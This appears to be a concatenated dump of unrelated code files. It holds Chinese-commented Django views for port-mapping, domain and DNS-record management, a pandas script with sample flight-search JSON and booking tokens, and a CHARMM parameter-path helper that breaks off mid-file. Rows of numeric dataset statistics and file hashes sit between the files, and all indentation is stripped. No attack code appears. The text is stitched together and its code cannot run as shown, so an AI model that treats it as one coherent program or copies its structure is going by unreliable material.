page = 1
# 对取到的数据进行分页,记得定义每页的数量
p = Paginator(records, 16, request=request)
# 分页处理后的 QuerySet
records = p.page(page)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'records': records,
'keyword': keyword,
'record_nums': record_nums,
}
return render(request, 'host_management/port/port_to_port_list.html', context=context)
else:
return HttpResponse(status=403)
######################################
# 添加映射
######################################
class AddPortToPortView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
ip_in = request.POST.get('ip_in')
port_in = request.POST.get('port_in')
if PortToPortInfo.objects.filter(ip_in=ip_in).filter(port_in=port_in).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"该记录已存在,请检查!"}', content_type='application/json')
add_port_to_port_form = AddPortToPortForm(request.POST)
if add_port_to_port_form.is_valid():
port_info = PortToPortInfo()
port_info.ip_out = request.POST.get('ip_out', '')
port_info.port_out = request.POST.get('port_out')
port_info.ip_in = ip_in
port_info.port_in = port_in
port_info.use = request.POST.get('use')
port_info.desc = request.POST.get('desc', '')
port_info.add_user = request.user
port_info.update_user = request.user
port_info.status = 1
port_info.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = port_info.id
op_record.operation = 1
op_record.action = "添加 [ %s:%s ] 映射:[ %s:%s ]" % (port_info.ip_out, port_info.port_out, port_info.ip_in, port_info.port_in)
op_record.save()
return HttpResponse('{"status":"success", "msg":"添加映射成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 编辑映射
######################################
class EditPortToPortView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
port_info = PortToPortInfo.objects.get(id=int(request.POST.get('p_id')))
ip_in = request.POST.get('ip_in')
port_in = request.POST.get('port_in')
if (port_info.ip_in != ip_in) and (port_info.port_in != port_in):
if PortToPortInfo.objects.filter(ip_in=ip_in).filter(port_in=port_in).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"该记录已存在,请检查!"}', content_type='application/json')
edit_port_to_port_form = EditPortToPortForm(request.POST)
if edit_port_to_port_form.is_valid():
port_info.ip_out = request.POST.get('ip_out', '')
port_info.port_out = request.POST.get('port_out')
port_info.ip_in = ip_in
port_info.port_in = port_in
port_info.use = request.POST.get('use')
port_info.desc = request.POST.get('desc', '')
port_info.update_user = request.user
port_info.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = port_info.id
op_record.operation = 2
op_record.action = "编辑 [ %s:%s ] 映射:[ %s:%s ]" % (port_info.ip_out, port_info.port_out, port_info.ip_in, port_info.port_in)
op_record.save()
return HttpResponse('{"status":"success", "msg":"编辑映射成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 删除映射
######################################
class DeletePortToPortView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
port_info = PortToPortInfo.objects.get(id=int(request.POST.get('p_id')))
port_info.update_user = request.user
port_info.status = 0
port_info.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = port_info.id
op_record.operation = 4
op_record.action = "停用 [ %s:%s ] 映射:[ %s:%s ]" % (port_info.ip_out, port_info.port_out, port_info.ip_in, port_info.port_in)
op_record.save()
return HttpResponse('{"status":"success", "msg":"停用映射成功!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 域名列表
######################################
class DomainNameListView(LoginStatusCheck, View):
def get(self, request):
if request.user.role > 1:
# 页面选择
web_chose_left_1 = 'port_domain'
web_chose_left_2 = 'domain_name'
web_chose_middle = ''
records = DomainNameInfo.objects.filter(status=1).order_by('-update_time')
# 关键字
keyword = request.GET.get('keyword', '')
if keyword != '':
records = records.filter(
Q(name__icontains=keyword) | Q(desc__icontains=keyword))
# 数量
record_nums = records.count()
# 判断页码
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# 对取到的数据进行分页,记得定义每页的数量
p = Paginator(records, 16, request=request)
# 分页处理后的 QuerySet
records = p.page(page)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'records': records,
'keyword': keyword,
'record_nums': record_nums,
}
return render(request, 'host_management/port/domain_name_list.html', context=context)
else:
return HttpResponse(status=403)
######################################
# 添加域名
######################################
class AddDomainNameView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
name = request.POST.get('name')
if DomainNameInfo.objects.filter(name=name).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"该记录已存在,请检查!"}', content_type='application/json')
add_domain_name_form = AddDomainNameForm(request.POST)
if add_domain_name_form.is_valid():
domain_info = DomainNameInfo()
domain_info.name = request.POST.get('name')
domain_info.desc = request.POST.get('desc', '')
domain_info.add_user = request.user
domain_info.update_user = request.user
domain_info.status = 1
domain_info.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = domain_info.id
op_record.operation = 1
op_record.action = "添加域名:%s" % domain_info.name
op_record.save()
return HttpResponse('{"status":"success", "msg":"添加域名成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 修改域名
######################################
class EditDomainNameView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
domain_info = DomainNameInfo.objects.get(id=int(request.POST.get('do_id')))
name = request.POST.get('name')
if domain_info.name != name:
if DomainNameInfo.objects.filter(name=name).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"该记录已存在,请检查!"}', content_type='application/json')
edit_domain_name_form = EditDomainNameForm(request.POST)
if edit_domain_name_form.is_valid():
domain_info.name = request.POST.get('name')
domain_info.desc = request.POST.get('desc', '')
domain_info.update_user = request.user
domain_info.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = domain_info.id
op_record.operation = 2
op_record.action = "修改域名:%s" % domain_info.name
op_record.save()
return HttpResponse('{"status":"success", "msg":"修改域名成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 删除域名
######################################
class DeleteDomainNameView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
domain_info = DomainNameInfo.objects.get(id=int(request.POST.get('do_id')))
domain_info.update_user = request.user
domain_info.status = 0
domain_info.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = domain_info.id
op_record.operation = 4
op_record.action = "停用域名:%s" % domain_info.name
op_record.save()
return HttpResponse('{"status":"success", "msg":"停用域名成功!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 域名解析列表
######################################
class DomainNameResolveListView(LoginStatusCheck, View):
def get(self, request):
if request.user.role > 1:
# 页面选择
web_chose_left_1 = 'port_domain'
web_chose_left_2 = 'domain_resolve'
web_chose_middle = ''
records = DomainNameResolveInfo.objects.filter(status=1).order_by('-update_time')
# 关键字
keyword = request.GET.get('keyword', '')
if keyword != '':
records = records.filter(Q(ip=keyword) | Q(domain_name__name__icontains=keyword) | Q(desc__icontains=keyword))
# 数量
record_nums = records.count()
# 判断页码
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# 对取到的数据进行分页,记得定义每页的数量
p = Paginator(records, 16, request=request)
# 分页处理后的 QuerySet
records = p.page(page)
domains = DomainNameInfo.objects.filter(status=1)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'records': records,
'keyword': keyword,
'record_nums': record_nums,
'domains': domains,
}
return render(request, 'host_management/port/domain_name_resolve_list.html', context=context)
else:
return HttpResponse(status=403)
######################################
# 添加域名解析
######################################
class AddDomainNameResolveView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
name = request.POST.get('name')
domain_name_id = int(request.POST.get('domain_name'))
if DomainNameResolveInfo.objects.filter(name=name).filter(domain_name_id=domain_name_id).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"该记录已存在,请检查!"}', content_type='application/json')
add_domain_resolve_form = AddDomainNameResolveForm(request.POST)
if add_domain_resolve_form.is_valid():
domain_info = DomainNameResolveInfo()
domain_info.name = name
domain_info.domain_name_id = domain_name_id
domain_info.desc = request.POST.get('desc', '')
domain_info.ip = request.POST.get('ip')
domain_info.add_user = request.user
domain_info.update_user = request.user
domain_info.status = 1
domain_info.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = domain_info.id
op_record.operation = 1
op_record.action = "添加域名解析:%s.%s" % (domain_info.name, domain_info.domain_name.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"添加域名解析成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 修改域名解析
######################################
class EditDomainNameResolveView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
domain_info = DomainNameResolveInfo.objects.get(id=int(request.POST.get('do_id')))
name = request.POST.get('name')
domain_name_id = int(request.POST.get('domain_name'))
if (domain_info.name != name) and (domain_info.domain_name_id != domain_name_id):
if DomainNameResolveInfo.objects.filter(name=name).filter(domain_name_id=domain_name_id).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"该记录已存在,请检查!"}', content_type='application/json')
edit_domain_reslove_form = EditDomainNameResolveForm(request.POST)
if edit_domain_reslove_form.is_valid():
domain_info.name = name
domain_info.domain_name_id = domain_name_id
domain_info.ip = request.POST.get('ip')
domain_info.desc = request.POST.get('desc', '')
domain_info.update_user = request.user
domain_info.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = domain_info.id
op_record.operation = 2
op_record.action = "修改域名解析:%s.%s" % (domain_info.name, domain_info.domain_name.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"修改域名解析成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 删除域名解析
######################################
class DeleteDomainNameResolveView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
domain_info = DomainNameResolveInfo.objects.get(id=int(request.POST.get('do_id')))
domain_info.update_user = request.user
domain_info.status = 0
domain_info.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = domain_info.id
op_record.operation = 4
op_record.action = "停用域名解析:%s.%s" % (domain_info.name, domain_info.domain_name.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"停用域名成功!"}', content_type='application/json')
else:
return HttpResponse(status=403)
| 37.906869
| 139
| 0.516058
| 9,128
| 89,953
| 4.867331
| 0.050394
| 0.060501
| 0.063022
| 0.053839
| 0.850165
| 0.825992
| 0.795854
| 0.77616
| 0.747057
| 0.712845
| 0
| 0.009103
| 0.318522
| 89,953
| 2,372
| 140
| 37.92285
| 0.715665
| 0.018321
| 0
| 0.711372
| 0
| 0
| 0.11163
| 0.009965
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035229
| false
| 0.008035
| 0.008035
| 0
| 0.176143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1286264ce1a2a5e202601ed2ba724cf5f1fb1b7a
| 9,138
|
py
|
Python
|
app/pandas_storedata.py
|
StefanEkstromFFCG/FlightPlanner
|
c5925482536c893b371dff71214f1e2794974ad2
|
[
"Apache-2.0"
] | null | null | null |
app/pandas_storedata.py
|
StefanEkstromFFCG/FlightPlanner
|
c5925482536c893b371dff71214f1e2794974ad2
|
[
"Apache-2.0"
] | null | null | null |
app/pandas_storedata.py
|
StefanEkstromFFCG/FlightPlanner
|
c5925482536c893b371dff71214f1e2794974ad2
|
[
"Apache-2.0"
] | null | null | null |
import pandas as pd
testdata = [{
"mapIdfrom": "stockholm",
"duration": {
"total": 9600,
"return": 0,
"departure": 9600
},
"flyTo": "BSL",
"conversion": {
"EUR": 100
},
"deep_link": "https://www.kiwi.com/deep?from=ARN&to=BSL&departure=08-02-2018&flightsId=3532731584995748_0&price=100&passengers=1&affilid=picky&lang=en¤cy=EUR&booking_token=TjFsU9KOyjpEDqm5dNSrO1ZjuRMVMgZrERrSppD325T6P8+P9w468E+3gYirNKm0xjFEaQ8brFkJXYHcFnHHQMiKg0Dkoaiav5UhUit795hlDRZUq8aCyCTw4fdhJod+M1d5SBkLVg1lwCO7BMx27VCT3Q9Hrva2qEgOjLlVpj5UudFifyQk06/Q1fRgpWMLttxF/Rsa2KFpHeNOBIAe8qD3iItXqXEOyyBLNe/haERG1OWSTyvCq0tBWL307IfhOOb/DvWplr5UUU1EjUQqHdglL60JkUQRooqwhV2E4FEXciLiRSaK66yHDlJBfMlJNu2ZWjmfOOVknbosUTEv40cp+L4ujUbjyPIqW50Lv1gN6443+ogkBUD3/EKK5CuubyI5IkNZfE8G1bec/+0640LK4uy57LwHKHAxqijH8LPfeLrTPRdGJuLsDOP5lBqv4sVSPiyq/Ocp7Q3QbLvYhvPWK/n/+b2QNso+hFxyPNXe+9dN+ZS7BbSTIlR6TJY8eUGEPCf8kUnAlSewkkxOkFiD4lqpthuVth+YP1BjWNUU/BarAis3V+5Xxj39SwPLl+DQWA9EGNeylyvC6suUVs22YnVIKkt8Wf2vMH3JAoggmT/MWB0xXq7XyWwb1s/eBB3I7cmZTMpW/Hk5yWM+VD0WnjRSaLL6i1ZC01B829U=",
"mapIdto": "freiburg",
"nightsInDest": None,
"airlines": [
"U2"
],
"id": "3532731584995748_0",
"facilitated_booking_available": True,
"pnr_count": 1,
"fly_duration": "2h 40m",
"countryTo": {
"code": "CH",
"name": "Switzerland"
},
"baglimit": {
"hand_width": 45,
"hand_length": 56,
"hold_weight": 15,
"hand_height": 25,
"hand_weight": 15
},
"aTimeUTC": 1518123000,
"p3": 1,
"price": 100,
"type_flights": [
"lcc-U2"
],
"bags_price": {
"1": 21,
"2": 46
},
"cityTo": "Basel",
"transfers": [],
"flyFrom": "ARN",
"dTimeUTC": 1518113400,
"p2": 1,
"countryFrom": {
"code": "SE",
"name": "Sweden"
},
"p1": 1,
"dTime": 1518117000,
"found_on": [
"deprecated"
],
"booking_token": "TjFsU9KOyjpEDqm5dNSrO1ZjuRMVMgZrERrSppD325T6P8+P9w468E+3gYirNKm0xjFEaQ8brFkJXYHcFnHHQMiKg0Dkoaiav5UhUit795hlDRZUq8aCyCTw4fdhJod+M1d5SBkLVg1lwCO7BMx27VCT3Q9Hrva2qEgOjLlVpj5UudFifyQk06/Q1fRgpWMLttxF/Rsa2KFpHeNOBIAe8qD3iItXqXEOyyBLNe/haERG1OWSTyvCq0tBWL307IfhOOb/DvWplr5UUU1EjUQqHdglL60JkUQRooqwhV2E4FEXciLiRSaK66yHDlJBfMlJNu2ZWjmfOOVknbosUTEv40cp+L4ujUbjyPIqW50Lv1gN6443+ogkBUD3/EKK5CuubyI5IkNZfE8G1bec/+0640LK4uy57LwHKHAxqijH8LPfeLrTPRdGJuLsDOP5lBqv4sVSPiyq/Ocp7Q3QbLvYhvPWK/n/+b2QNso+hFxyPNXe+9dN+ZS7BbSTIlR6TJY8eUGEPCf8kUnAlSewkkxOkFiD4lqpthuVth+YP1BjWNUU/BarAis3V+5Xxj39SwPLl+DQWA9EGNeylyvC6suUVs22YnVIKkt8Wf2vMH3JAoggmT/MWB0xXq7XyWwb1s/eBB3I7cmZTMpW/Hk5yWM+VD0WnjRSaLL6i1ZC01B829U=",
"routes": [
[
"ARN",
"BSL"
]
],
"cityFrom": "Stockholm",
"aTime": 1518126600,
"route": [
{
"bags_recheck_required": False,
"mapIdfrom": "stockholm",
"flight_no": 1146,
"original_return": 0,
"lngFrom": 17.918611,
"flyTo": "BSL",
"guarantee": False,
"latTo": 47.601111,
"source": "deprecated",
"combination_id": "3532731584995748",
"id": "3532731584995748_0",
"latFrom": 59.651944,
"lngTo": 7.521667,
"dTimeUTC": 1518113400,
"aTimeUTC": 1518123000,
"return": 0,
"price": 1,
"cityTo": "Basel",
"vehicle_type": "aircraft",
"flyFrom": "ARN",
"mapIdto": "freiburg",
"dTime": 1518117000,
"found_on": "deprecated",
"airline": "U2",
"cityFrom": "Stockholm",
"aTime": 1518126600
}
],
"distance": 1502.8
},
{
"mapIdfrom": "stockholm",
"duration": {
"total": 10200,
"return": 0,
"departure": 10200
},
"flyTo": "BRS",
"conversion": {
"EUR": 100
},
"deep_link": "https://www.kiwi.com/deep?from=ARN&to=BRS&departure=08-02-2018&flightsId=3527234017512062_0&price=100&passengers=1&affilid=picky&lang=en¤cy=EUR&booking_token=TjFsU9KOyjpEDqm5dNSrO1ZjuRMVMgZrERrSppD325T6P8+P9w468E+3gYirNKm0xjFEaQ8brFkJXYHcFnHHQMiKg0Dkoaiav5UhUit795jwlbK911PNijl7eYOxulSkGzHpDCd7mD9Y/laljq7gTs6z4I1/tScNq7YubfKhvw5xy22gpuARChyVFi4o6pGAGkOrPNHvbiWFuQ8YEP2yjahIiMrB3f6AOUxXUnw9CmRW2h+gXbT/0NL9UwmzZu9+czI1en1oHWiSdEYicuOJH1fxPkwjh66dGEu3CevHFJnSsh86lT6mUOag1lVfKBQsEFT02zxluNvhIuoI2q988qo+oLx7k6xVYPZ+WcD9GPdNvLWy9jhjNqhe+RYQUX9F4jIg0LdgwqlBDjt1999qCoRMf/4W4nG45Eb8FmTmv6yNh92S34XvlBdzwO35RHRoL5vVygXBMZ6i+kav2MXohRAb1TDrkc/UXdbLqMDGjlWfrofFzJxAPYL+oWQgKKI+Exk1WNndH2SHYAtFs0KnTLFciX+aMHB1EH0oILdTpqp0hJRsd9Qd4YV8rZ0WzJR4wKtpAud6/WsIKGRLBbO6qRMhH02iHAJ1hVOKbW2vJZlY8nyxZ5atxs8G7eQsPEgunCUbCyV5GPVzt6vvpgDHZhG4AzDBdq+5i464um0OcAE=",
"mapIdto": "bristol",
"nightsInDest": None,
"airlines": [
"U2"
],
"id": "3527234017512062_0",
"facilitated_booking_available": True,
"pnr_count": 1,
"fly_duration": "2h 50m",
"countryTo": {
"code": "GB",
"name": "United Kingdom"
},
"baglimit": {
"hand_width": 45,
"hand_length": 56,
"hold_weight": 15,
"hand_height": 25,
"hand_weight": 15
},
"aTimeUTC": 1518116100,
"p3": 1,
"price": 100,
"type_flights": [
"lcc-U2"
],
"bags_price": {
"1": 21,
"2": 46
},
"cityTo": "Bristol",
"transfers": [],
"flyFrom": "ARN",
"dTimeUTC": 1518105900,
"p2": 1,
"countryFrom": {
"code": "SE",
"name": "Sweden"
},
"p1": 1,
"dTime": 1518109500,
"found_on": [
"deprecated"
],
"booking_token": "TjFsU9KOyjpEDqm5dNSrO1ZjuRMVMgZrERrSppD325T6P8+P9w468E+3gYirNKm0xjFEaQ8brFkJXYHcFnHHQMiKg0Dkoaiav5UhUit795jwlbK911PNijl7eYOxulSkGzHpDCd7mD9Y/laljq7gTs6z4I1/tScNq7YubfKhvw5xy22gpuARChyVFi4o6pGAGkOrPNHvbiWFuQ8YEP2yjahIiMrB3f6AOUxXUnw9CmRW2h+gXbT/0NL9UwmzZu9+czI1en1oHWiSdEYicuOJH1fxPkwjh66dGEu3CevHFJnSsh86lT6mUOag1lVfKBQsEFT02zxluNvhIuoI2q988qo+oLx7k6xVYPZ+WcD9GPdNvLWy9jhjNqhe+RYQUX9F4jIg0LdgwqlBDjt1999qCoRMf/4W4nG45Eb8FmTmv6yNh92S34XvlBdzwO35RHRoL5vVygXBMZ6i+kav2MXohRAb1TDrkc/UXdbLqMDGjlWfrofFzJxAPYL+oWQgKKI+Exk1WNndH2SHYAtFs0KnTLFciX+aMHB1EH0oILdTpqp0hJRsd9Qd4YV8rZ0WzJR4wKtpAud6/WsIKGRLBbO6qRMhH02iHAJ1hVOKbW2vJZlY8nyxZ5atxs8G7eQsPEgunCUbCyV5GPVzt6vvpgDHZhG4AzDBdq+5i464um0OcAE=",
"routes": [
[
"ARN",
"BRS"
]
],
"cityFrom": "Stockholm",
"aTime": 1518116100,
"route": [
{
"bags_recheck_required": False,
"mapIdfrom": "stockholm",
"flight_no": 6034,
"original_return": 0,
"lngFrom": 17.918611,
"flyTo": "BRS",
"guarantee": False,
"latTo": 51.3825,
"source": "deprecated",
"combination_id": "3527234017512062",
"id": "3527234017512062_0",
"latFrom": 59.651944,
"lngTo": -2.718889,
"dTimeUTC": 1518105900,
"aTimeUTC": 1518116100,
"return": 0,
"price": 1,
"cityTo": "Bristol",
"vehicle_type": "aircraft",
"flyFrom": "ARN",
"mapIdto": "bristol",
"dTime": 1518109500,
"found_on": "deprecated",
"airline": "U2",
"cityFrom": "Stockholm",
"aTime": 1518116100
}
],
"distance": 1582.73
}]
df = pd.DataFrame(testdata)
df.to_csv("test_pandas.csv")
| 45.014778
| 876
| 0.536222
| 504
| 9,138
| 9.619048
| 0.388889
| 0.008663
| 0.047855
| 0.05363
| 0.813119
| 0.764026
| 0.749175
| 0.727723
| 0.707921
| 0.685231
| 0
| 0.162648
| 0.360144
| 9,138
| 202
| 877
| 45.237624
| 0.666496
| 0
| 0
| 0.71066
| 0
| 0.020305
| 0.509358
| 0.160665
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.010152
| 0.005076
| 0
| 0.005076
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
42450d2dab6bf443dd200a22a1a1d01fb39bc542
| 7,592
|
py
|
Python
|
xtalmdscripts/buildsystem/utils.py
|
wutobias/xtalmd-scripts
|
672cb9a37ae5c396bb25a61499f58066ec5083a1
|
[
"MIT"
] | 1
|
2022-02-11T23:21:45.000Z
|
2022-02-11T23:21:45.000Z
|
xtalmdscripts/buildsystem/utils.py
|
wutobias/xtalmd-scripts
|
672cb9a37ae5c396bb25a61499f58066ec5083a1
|
[
"MIT"
] | 1
|
2022-02-23T20:09:31.000Z
|
2022-02-24T18:14:04.000Z
|
xtalmdscripts/buildsystem/utils.py
|
wutobias/xtalmd-scripts
|
672cb9a37ae5c396bb25a61499f58066ec5083a1
|
[
"MIT"
] | null | null | null |
def get_params_path_list(toppar_dir_path):
params_path_list = [
f"{toppar_dir_path}/top_all36_prot.rtf",
f"{toppar_dir_path}/par_all36m_prot.prm",
f"{toppar_dir_path}/top_all36_na.rtf",
f"{toppar_dir_path}/par_all36_na.prm",
f"{toppar_dir_path}/top_all36_carb.rtf",
f"{toppar_dir_path}/par_all36_carb.prm",
f"{toppar_dir_path}/top_all36_lipid.rtf",
f"{toppar_dir_path}/par_all36_lipid.prm",
f"{toppar_dir_path}/top_all36_cgenff.rtf",
f"{toppar_dir_path}/par_all36_cgenff.prm",
### f"{toppar_dir_path}/toppar_all36_moreions.str",
### f"{toppar_dir_path}/top_interface.rtf",
### f"{toppar_dir_path}/par_interface.prm",
### f"{toppar_dir_path}/toppar_all36_nano_lig.str",
### f"{toppar_dir_path}/toppar_all36_nano_lig_patch.str",
### f"{toppar_dir_path}/toppar_all36_synthetic_polymer.str",
### f"{toppar_dir_path}/toppar_all36_synthetic_polymer_patch.str",
### f"{toppar_dir_path}/toppar_all36_polymer_solvent.str",
### f"{toppar_dir_path}/toppar_water_ions.str",
### f"{toppar_dir_path}/toppar_dum_noble_gases.str",
### f"{toppar_dir_path}/toppar_ions_won.str",
### f"{toppar_dir_path}/toppar_all36_prot_arg0.str",
### f"{toppar_dir_path}/toppar_all36_prot_c36m_d_aminoacids.str",
### f"{toppar_dir_path}/toppar_all36_prot_fluoro_alkanes.str",
### f"{toppar_dir_path}/toppar_all36_prot_heme.str",
### f"{toppar_dir_path}/toppar_all36_prot_na_combined.str",
### f"{toppar_dir_path}/toppar_all36_prot_retinol.str",
### f"{toppar_dir_path}/toppar_all36_prot_model.str",
### f"{toppar_dir_path}/toppar_all36_prot_modify_res.str",
### f"{toppar_dir_path}/toppar_all36_na_nad_ppi.str",
### f"{toppar_dir_path}/toppar_all36_na_rna_modified.str",
### f"{toppar_dir_path}/toppar_all36_lipid_sphingo.str",
### f"{toppar_dir_path}/toppar_all36_lipid_archaeal.str",
### f"{toppar_dir_path}/toppar_all36_lipid_bacterial.str",
### f"{toppar_dir_path}/toppar_all36_lipid_cardiolipin.str",
### f"{toppar_dir_path}/toppar_all36_lipid_cholesterol.str",
### f"{toppar_dir_path}/toppar_all36_lipid_dag.str",
### f"{toppar_dir_path}/toppar_all36_lipid_inositol.str",
### f"{toppar_dir_path}/toppar_all36_lipid_lnp.str",
### f"{toppar_dir_path}/toppar_all36_lipid_lps.str",
### f"{toppar_dir_path}/toppar_all36_lipid_mycobacterial.str",
### f"{toppar_dir_path}/toppar_all36_lipid_miscellaneous.str",
### f"{toppar_dir_path}/toppar_all36_lipid_model.str",
### f"{toppar_dir_path}/toppar_all36_lipid_prot.str",
### f"{toppar_dir_path}/toppar_all36_lipid_tag.str",
### f"{toppar_dir_path}/toppar_all36_lipid_yeast.str",
### f"{toppar_dir_path}/toppar_all36_lipid_hmmm.str",
### f"{toppar_dir_path}/toppar_all36_lipid_detergent.str",
### f"{toppar_dir_path}/toppar_all36_lipid_ether.str",
### f"{toppar_dir_path}/toppar_all36_carb_glycolipid.str",
### f"{toppar_dir_path}/toppar_all36_carb_glycopeptide.str",
### f"{toppar_dir_path}/toppar_all36_carb_imlab.str",
### f"{toppar_dir_path}/toppar_all36_label_spin.str",
### f"{toppar_dir_path}/toppar_all36_label_fluorophore.str",
]
return params_path_list
def get_charmm_inp_header(toppar_dir_path):
charmm_inp_header = f"""
! protein topology and parameter
open read card unit 10 name {toppar_dir_path}/top_all36_prot.rtf
read rtf card unit 10
open read card unit 20 name {toppar_dir_path}/par_all36m_prot.prm
read para card unit 20 flex
! nucleic acids
open read card unit 10 name {toppar_dir_path}/top_all36_na.rtf
read rtf card unit 10 append
open read card unit 20 name {toppar_dir_path}/par_all36_na.prm
read para card unit 20 append flex
! carbohydrates
open read card unit 10 name {toppar_dir_path}/top_all36_carb.rtf
read rtf card unit 10 append
open read card unit 20 name {toppar_dir_path}/par_all36_carb.prm
read para card unit 20 append flex
! lipids
open read card unit 10 name {toppar_dir_path}/top_all36_lipid.rtf
read rtf card unit 10 append
open read card unit 20 name {toppar_dir_path}/par_all36_lipid.prm
read para card unit 20 append flex
! CGENFF
open read card unit 10 name {toppar_dir_path}/top_all36_cgenff.rtf
read rtf card unit 10 append
open read card unit 20 name {toppar_dir_path}/par_all36_cgenff.prm
read para card unit 20 append flex
!!!
!!!
!!! ! Phosphates and Sulfates
!!! !stream {toppar_dir_path}/toppar_all36_moreions.str
!!!
!!! ! Interface FF
!!! open read card unit 10 name {toppar_dir_path}/top_interface.rtf
!!! read rtf card unit 10 append
!!!
!!! open read card unit 10 name {toppar_dir_path}/par_interface.prm
!!! read para card unit 10 append flex
!!!
!!! stream {toppar_dir_path}/toppar_all36_nano_lig.str
!!! stream {toppar_dir_path}/toppar_all36_nano_lig_patch.str
!!!
!!! ! Additional topologies and parameters for synthetic polymer
!!! stream {toppar_dir_path}/toppar_all36_synthetic_polymer.str
!!! stream {toppar_dir_path}/toppar_all36_synthetic_polymer_patch.str
!!! stream {toppar_dir_path}/toppar_all36_polymer_solvent.str
!!!
!!! ! Additional topologies and parameters for water and ions
!!! stream {toppar_dir_path}/toppar_water_ions.str
!!! stream {toppar_dir_path}/toppar_dum_noble_gases.str
!!! stream {toppar_dir_path}/toppar_ions_won.str
!!!
!!! ! Additional topologies and parameters for protein
!!! stream {toppar_dir_path}/toppar_all36_prot_arg0.str
!!! stream {toppar_dir_path}/toppar_all36_prot_c36m_d_aminoacids.str
!!! stream {toppar_dir_path}/toppar_all36_prot_fluoro_alkanes.str
!!! stream {toppar_dir_path}/toppar_all36_prot_heme.str
!!! stream {toppar_dir_path}/toppar_all36_prot_na_combined.str
!!! stream {toppar_dir_path}/toppar_all36_prot_retinol.str
!!! stream {toppar_dir_path}/toppar_all36_prot_model.str
!!! stream {toppar_dir_path}/toppar_all36_prot_modify_res.str
!!!
!!! ! Additional topologies and parameters for nucleic acids
!!! stream {toppar_dir_path}/toppar_all36_na_nad_ppi.str
!!! stream {toppar_dir_path}/toppar_all36_na_rna_modified.str
!!!
!!! ! Additional topologies and parameters for lipids
!!! stream {toppar_dir_path}/toppar_all36_lipid_sphingo.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_archaeal.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_bacterial.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_cardiolipin.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_cholesterol.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_dag.str
